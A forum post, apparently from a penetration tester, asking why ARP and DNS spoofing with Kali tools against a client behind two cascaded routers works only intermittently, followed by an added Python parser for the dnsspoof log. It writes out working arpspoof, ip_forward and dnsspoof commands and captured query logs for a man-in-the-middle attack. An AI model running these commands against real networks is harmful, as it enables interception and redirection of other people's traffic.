Kali DnsSpoof in a weird network


kdlsw

Hi, I did a pentest in a LAN, some weird things happened.

This LAN is a little unusual: there are two routers, say A and B. A is directly connected to an optical fiber, doing PPPoE to the WAN, and has a gateway of 192.168.1.1. B, a wireless router, is connected to A and has a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. The target has an IP of 192.168.0.104.

Here is what I did with Kali: I used the following to ARP spoof the target and router B:

arpspoof  -i  eth0  -t  192.168.0.1  192.168.0.104
arpspoof  -i  eth0  -t  192.168.0.104  192.168.0.1
sysctl -w net.ipv4.ip_forward=1

Then I did a Dns Spoof with

dnsspoof  -i  eth0  -f  dnshost.spoof

It did not work, all the traffic went through my Kali, but the target was still able to access the original webpage.

And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding

sysctl -w  net.ipv4.ip_forward=0

and I started exactly the same dnsspoof as last time again, and it worked!

This really confused me, because after that I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all (I left it at the default 0), and it did not work, because the ARP traffic was not working (which is expected!!). Arpspoof and dnsspoof both work ONLY IF the process "IP forwarding is first enabled and then disabled" has completed once before launching dnsspoof. With IP forwarding only on, dnsspoof does not work; with IP forwarding always off, arpspoof does not work.

Besides that, there are two more strange things I failed to understand.

1. Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure.

2. Here is the log/feedback of a DnsSpoof:

root@kali:~# dnsspoof -i eth0 -f dnshost.spoof 
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
192.168.0.104.62290 > 192.168.1.1.53:  4678+ A? www.youtube.com
192.168.0.104.62290 > 192.168.0.1.53:  4678+ A? www.youtube.com
192.168.0.104.65063 > 192.168.1.1.53:  31827+ A? www.youtube.com
192.168.0.104.65063 > 192.168.0.1.53:  31827+ A? www.youtube.com
192.168.0.104.55426 > 192.168.1.1.53:  51608+ A? www.sina.com
192.168.0.104.55426 > 192.168.0.1.53:  51608+ A? www.sina.com
192.168.0.104.54794 > 192.168.1.1.53:  5651+ A? www.sina.com
192.168.0.104.54794 > 192.168.0.1.53:  5651+ A? www.sina.com
192.168.0.104.60485 > 192.168.1.1.53:  2950+ A? www.sina.com
192.168.0.104.63394 > 192.168.1.1.53:  41196+ A? www.facebook.com
192.168.0.104.63394 > 192.168.0.1.53:  41196+ A? www.facebook.com
192.168.0.104.52953 > 192.168.1.1.53:  6912+ A? www.facebook.com
192.168.0.104.52953 > 192.168.0.1.53:  6912+ A? www.facebook.com
^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof 
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
192.168.0.104.50239 > 192.168.1.1.53:  28894+ A? www.sina.com
192.168.0.104.50239 > 192.168.1.1.53:  28894+ A? www.sina.com

The second launch was a failed one; the first one succeeded. The router I am targeting should be 192.168.0.1, i.e. router B. In the second launch, it is interacting only with router A (192.168.1.1). I am not sure what that means or whether it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch sometimes worked.

I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks
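
Added example, not part of the original post: a small Python parser for the dnsspoof output lines shown above, which groups queries by client IP, source port and query ID and reports which resolver addresses each query was sent to and how many times it was captured. The sample lines are copied from the two runs in the post; the function names and labels are this example's own.

```python
import re
from collections import defaultdict

# One dnsspoof output line, as shown in the post:
#   192.168.0.104.62290 > 192.168.1.1.53:  4678+ A? www.youtube.com
LINE = re.compile(
    r"^(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.\d+:\s+"
    r"(?P<txid>\d+)\+? \S+\? (?P<name>\S+)$"
)

# Sample input: lines copied from the post's first and second runs.
RUN_1 = """\
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113]
192.168.0.104.62290 > 192.168.1.1.53:  4678+ A? www.youtube.com
192.168.0.104.62290 > 192.168.0.1.53:  4678+ A? www.youtube.com
192.168.0.104.60485 > 192.168.1.1.53:  2950+ A? www.sina.com
"""
RUN_2 = """\
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
192.168.0.104.53807 > 192.168.1.1.53:  60485+ A? www.youtube.com
"""

def summarize(log_text):
    """Map (client IP, source port, query ID) -> name and per-resolver counts."""
    queries = {}
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # banner, shell prompt, blank line
        key = (m["src"], int(m["sport"]), int(m["txid"]))
        entry = queries.setdefault(key, {"name": m["name"], "resolvers": defaultdict(int)})
        entry["resolvers"][m["dst"]] += 1
    return queries

def classify(entry):
    """Describe where one query was addressed and how often it was seen."""
    seen = entry["resolvers"]
    if len(seen) > 1:
        return "addressed to several resolvers"
    if max(seen.values()) > 1:
        return "same query captured more than once"
    return "single capture"

if __name__ == "__main__":
    for label, text in (("run 1", RUN_1), ("run 2", RUN_2)):
        for key, entry in summarize(text).items():
            print(label, key, entry["name"], dict(entry["resolvers"]), classify(entry))
```

On these lines, the first run's query 4678 is addressed to both 192.168.1.1 and 192.168.0.1, while the second run's query 60485 appears twice for 192.168.1.1 only (a retransmission or a second copy of the same packet on the wire).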
